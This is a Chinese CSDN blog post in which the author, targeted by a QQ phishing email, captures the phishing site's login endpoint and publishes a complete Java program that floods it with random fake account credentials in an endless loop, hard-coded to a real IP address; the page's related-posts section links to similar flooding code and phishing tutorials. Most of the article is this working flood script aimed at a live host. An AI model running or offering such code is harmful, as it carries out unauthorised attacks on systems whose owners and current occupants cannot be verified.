记一次攻击钓鱼网站

最新推荐文章于 2024-06-04 15:30:00 发布
最新推荐文章于 2024-06-04 15:30:00 发布
阅读量6.7k 收藏 33
点赞数 9
文章标签: 攻击 Java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36813807/article/details/84791180
版权

无聊中的我,收到一个邮件 里面告诉我 我的qq账号存在风险

这个人居然想搞我qq

 

从域名就可以判断出 是钓鱼网站于是我想给他来点刺激的

第一步找到他的接口地址

用于用谷歌网络调试去抓包发现在点击登录后 他会把账号密码发送到他服务器中

第二部写一个程序 攻击他,让他的数据库数据暴增 

package com.write.test;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.URL;
import java.net.URLConnection;
import java.util.List;
import java.util.Map;


/**
 * @作者: tjx
 * @描述:
 * @创建时间: 创建于16:00 2018/12/4
 **/
class DoGet implements Runnable{


    public static String sendGet(String url, String param) {
        String result = "";
        String urlName = url + "?" + param;
        try {
            URL realURL = new URL(urlName);
            URLConnection conn = realURL.openConnection();
            conn.setRequestProperty("accept", "*/*");
            conn.setRequestProperty("connection", "Keep-Alive");
            conn.setRequestProperty("user-agent", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36");
            conn.connect();
            Map<String, List<String>> map = conn.getHeaderFields();
            for (String s : map.keySet()) {
                System.out.println(s + "-->" + map.get(s));
            }
            BufferedReader in = new BufferedReader(new InputStreamReader(conn.getInputStream(), "utf-8"));
            String line;
            while ((line = in.readLine()) != null) {
                result += "\n" + line;
            }
        } catch (IOException e) {
            e.printStackTrace();
        }
        return result;
    }


    @Override
    public void run() {

        while (true){
            //随机账号
            String n = (int)((Math.random()*9+1)*1000000000)+"";
            String p = (int)((Math.random()*9+1)*10000000)+"";
            int ip = (int)((Math.random()*9+1)*100);
            String url = "http://185.227.153.30:5000/accountadd?n="+n+"&p="+p+"&cip=116."+ip+".238.243&cname=%E5%B9%BF%E4%B8%9C%E7%9C%81%E6%B7%B1%E5%9C%B3%E5%B8%82&u=4&t=3?qqdrsign";
            System.out.println(url);
            sendGet(url,null);
        }
    }
}
public class Fishing {




    public static void main(String[] args) {

        for (int i = 0;i<5;i++){
            DoGet doGet = new DoGet();
            doGet.run();
        }



    }
}

 

挨踢社区
关注
  • 9
    点赞
  • 33
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
05 - 钓鱼网站攻击与防御
weixin_43586169的博客
03-31 1976
详细介绍了钓鱼网站攻击原理,以及还原
简单的攻击钓鱼网站
小傲傲的博客
07-13 1247
分析好了目标url然后分析好了json即可,我这里演示一个英雄联盟的钓鱼网站,我差点就被钓到了,还好我看了一下域名。 直接上代码,我用的是Android库 OKhttp 在java也适用。 我的IP以及被服务器封了 有兴趣的小伙伴复制了之后直接运行一下呗 哈哈哈 直接不做人-希望人没事 public class Test { public static void main(String[] args) { int i =0; while (true){
【黑客零基础入门必知必会】常见的网站攻击方式
最新发布
logic1001的博客
06-04 1919
这一篇是网络安全零基础入门系列的第四篇,关注我,持续更新ing在数字时代,网站攻击是一种常见而严重的威胁,可能导致个人隐私泄露、数据损坏,甚至是整个系统的瘫痪。为了帮助小白用户更好地了解并防范这些威胁,我们将深入研究一些常见的网站攻击方式,包括攻击原理、攻击目的以及防范措施。
钓鱼网站攻击过程
weixin_46484469的博客
06-10 1121
钓鱼网站攻击过程 攻击目的 获取客户的账号 ,密码以及个人信息 攻击方式 在dns服务器外拦截访问,反馈钓鱼网站给客户机 免费wifi,恶意二维码,虚假邮件 等等 攻击过程 攻击者需要仿照或者自己建立网站,这个网站一般是含有登录界面,比较简易,当客户端输入账号密码就会被截获, 防御方式 安全软件自动识别 ...
攻破黑市最流行的钓鱼网站
dfdhxb995397的博客
07-31 617
这种类型的钓鱼网站最少有上百个了~我风在指尖今天要为民除害~~~自己伪装成买家,花了150,从黑市买到这种钓鱼源码,开始进行研究钓鱼站是这样的看他的源码,我们得知,有专门的一个脚本用来过滤我们的XSS过滤xss 脚本如下 [AppleScript]纯文本查看复制代码 ? 01 02 03 04 05 06 07 08 09 1...
第三方网站实现支付宝登录
12-12
在这个过程中,用户只需在支付宝平台进行一次授权,第三方网站就能获取到一个访问令牌,用于后续的身份验证。 2. **支付宝开放平台**:支付宝开放平台提供了一系列API和SDK,供开发者集成支付宝登录功能。开发者...
基于深度学习的钓鱼页面检测系统 前后端架构.zip
03-28
在当今的互联网环境中,网络安全问题日益凸显,其中钓鱼网站的威胁尤为严重。钓鱼页面通常伪装成知名网站,诱骗用户输入敏感信息如账号密码,从而导致财产损失或个人信息泄露。针对这一问题,基于深度学习的钓鱼页面...
网络安全知识竞赛小测试--网络攻击技术.pdf
06-09
该网站可能属于钓鱼网站,冒充工商银行网站进行诈骗活动。(正确答案) C.先确保防火墙已经打开,防病毒软件已正确工作,然后放心打开并使用。 D.发给同学让同学去打开,确保安全后再用 19、攻击者常用的攻击工具有(1...
gophish-v0.11.0-linux-64bit.zip
08-11
gophish是一款流行的开源网络钓鱼工具,它为安全专业人员提供了模拟攻击的能力,以便评估组织的安全意识水平和检测潜在的网络钓鱼威胁。 首先,让我们深入了解gophish的核心概念。gophish由几个关键组件构成: 1. ...
gophish-v0.11.0-windows-64bit.zip
08-11
gophish是一款强大的安全工具,它主要用于模拟钓鱼攻击,帮助网络安全专业人员测试组织的防御能力,提升员工的安全意识。 首先,我们来了解下gophish的核心功能。gophish是一个全面的网络钓鱼框架,它由四个主要...
6.2 网络钓鱼攻击
热门推荐
qq_55202378的博客
08-13 2万+
网络钓鱼 error
详细描述钓鱼网站攻击的过程,发布到CSDN中,提交博客链接。
xx1726916387的博客
06-11 372
网络钓鱼与计算机病毒、木马程序不同, 它往往需要被攻击者主动配合才能发挥它的作用, 就是通过发送大量自称银行或其他机构的具有欺骗性的邮件, 引诱收信人泄露自身敏感信息的一种攻击方式。大型企业的日常工作中, 经常使用电子邮箱进行工作沟通、文件传输, 若遇到钓鱼邮件, 网络安全意识不强的员工往往会不经意间步入圈套, 输入自身敏感信息, 从而使不法分子拥有获取机密文件的权限, 易造成商业机密的泄露, 给企业带来不可估量的经济损失。 ...
详细描述钓鱼网站攻击的过程
libingbing_的博客
06-11 1192
网络钓鱼是通过大量发送声称来自于银行或其他知名机构的欺骗性垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号ID、ATMPIN码或信用卡详细信息)的一种攻击方式。最典型的网络钓鱼攻击将收信人引诱到一个通过精心设计与目标组织的网站非常相似的钓鱼网站上,并获取收信人在此网站上输入的个人敏感信息,通常这个攻击过程不会让受害者警觉。它是“社会工程攻击”的一种形式。网络钓鱼(Phishing),并不是一种新的入侵方法,但是它的危害范围却在逐渐扩大,成为最严重的网络威胁之一。Phishing就是指入侵者通过处心
钓鱼网站攻击量增近九成
weixin_34150503的博客
07-03 154
报告显示,对移动端所拦截的钓鱼网站进行分类发现,境外彩票类比重最高,为53.9%。其他占比较高的类型包括网站被黑(13.1%)、金融证券(10.5%)、虚假购物(9.4%)以及假医假药(3.3%)等类型的钓鱼网站。 根据360互联网安全中心的监测数据,广东(34.5%)、广西(9.4%)、福建(6.8%)、湖南(6.3%)是钓鱼网站(根据域名统计)分布最...
发现钓鱼网站,但是不会攻破,求大佬指示。
LeZaiJiongTu的博客
02-17 441
钓鱼网站是这个icerain.top:82/ 求一个大佬破坏 可以吗?不要让别人受骗了!
Web 3.0 中常见的网络钓鱼攻击
chinadefi的博客
05-26 907
Web 3.0 中常见的网络钓鱼攻击 简要介绍 Web 3的网络钓鱼日益增多,一些主要的网络钓鱼技术包括: 使用不安全的Discord机器人在一些官方的Discord服务器上发布钓鱼链接; 直接发送钓鱼链接; 利用搜索引擎上的广告宣传虚假网站; 通过假Discord机器人直接发送信息; 与官方域名高度相似的域名及内容; 利用Opensea等NFT交易平台推广虚假项目; 使用虚假的合约地址。 建议: 经常多渠道查看信息,不轻易信任“bot”或“官方链接”; 警惕直接消息:官方机器人不会在DM中要求验证
社会工程学攻击之网站钓鱼
weixin_34061482的博客
09-05 3626
前言网络给了我们方便的同时,但也并不总是那么美好。还得邀请苍蝇到它的客厅做客的蜘蛛吗?还得帮助蝎子渡河的乌龟吗?这些故事都包含了猎物的天真和猎手的肮脏。互联网也是如此,其中中充斥着诱惑的陷阱、阴暗的角落、恶意的行为。网站钓鱼就是其中的一种。 网站钓鱼相信不少人都听说过,它就是一种针对性的社会工程学攻击。现代社会工程学攻击通常以交谈、欺...
如何利用kali进行钓鱼网站攻击
v_14704的博客
10-02 1466
4.输入你的kali密码,如果没设置,一般的kali密码为:kali。输入后它不会显示你的密码!这样,我们的攻击就已经完成了!如果要让别人访问你的钓鱼网站就要用到【内网穿透】的知识了!对了,我们是【三月七讲编程】,欢迎到QQ小世界来关注我哦~加作者QQ好友的:3651666752,这是作者的QQ哦~10.上面是告诉我们,咱们的IP,一定要住!我们现在默认就行,也就是啥也别输入,回车就行!14.这时,我们刚刚kali告诉我们的IP就有用了!如果出现以下界面就代表克隆我们的钓鱼网站成功了,就已经开始钓鱼了!
钓鱼邮件攻击分析:从溯源到防御策略
"该文档是关于邮件钓鱼攻击的溯源分析,描述了一个安全专家如何通过分析一封假冒Microsoft Outlook Web App密码过期的钓鱼邮件,追踪攻击者的身份和攻击路径。" 邮件钓鱼攻击是一种常见的网络欺诈手段,攻击者通常...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值